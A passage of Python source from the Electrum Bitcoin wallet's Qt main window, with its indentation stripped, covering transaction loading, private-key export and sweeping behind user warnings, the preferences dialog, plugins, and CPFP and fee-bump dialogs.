parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("bitcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
self.show_message(repr(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
_('Mempool based: fee rate is targeting a depth in the memory pool')
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', x==2)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf = self.config.get('use_rbf', True)
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(use_rbf)
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', bool(x))
batch_rbf_cb.setEnabled(bool(x))
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
batch_rbf_cb = QCheckBox(_('Batch RBF transactions'))
batch_rbf_cb.setChecked(self.config.get('batch_rbf', False))
batch_rbf_cb.setEnabled(use_rbf)
batch_rbf_cb.setToolTip(
_('If you check this box, your unconfirmed transactions will be consolidated into a single transaction.') + '\n' + \
_('This will save fees.'))
def on_batch_rbf(x):
self.config.set_key('batch_rbf', bool(x))
batch_rbf_cb.stateChanged.connect(on_batch_rbf)
fee_widgets.append((batch_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = repr(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list
msg = (_('Base unit of your wallet.')
+ '\n1 BTC = 1000 mBTC. 1 mBTC = 1000 bits. 1 bit = 100 sat.\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
colortheme_combo.setCurrentIndex(index)
colortheme_label = QLabel(_('Color theme') + ':')
def on_colortheme(x):
self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
updatecheck_cb = QCheckBox(_("Automatically check for software updates"))
updatecheck_cb.setChecked(self.config.get('check_updates', False))
def on_set_updatecheck(v):
self.config.set_key('check_updates', v == Qt.Checked, save=True)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
filelogging_cb = QCheckBox(_("Write logs to file"))
filelogging_cb.setChecked(bool(self.config.get('log_to_file', False)))
def on_set_filelogging(v):
self.config.set_key('log_to_file', v == Qt.Checked, save=True)
self.need_restart = True
filelogging_cb.stateChanged.connect(on_set_filelogging)
filelogging_cb.setToolTip(_('Debug logs can be persisted to disk. These are useful for troubleshooting.'))
gui_widgets.append((filelogging_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.blockSignals(True)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
ex_combo.blockSignals(False)
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_model.refresh('on_history')
if self.fx.is_enabled() and checked:
self.fx.trigger_update()
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_model.refresh('on_history_capgains')
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('General')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.trigger_update()
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.network.unregister_callback(self.on_quotes)
self.network.unregister_callback(self.on_history)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_fee = self.wallet.get_tx_fee(parent_tx)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
out_amt = max_fee - fee_e.get_amount()
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_e.get_amount()
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
fee = self.wallet.get_tx_fee(tx)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current Fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('Current Fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate)))
vbox.addWidget(QLabel(_('New Fee rate') + ':'))
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
vbox.addWidget(feerate_e)
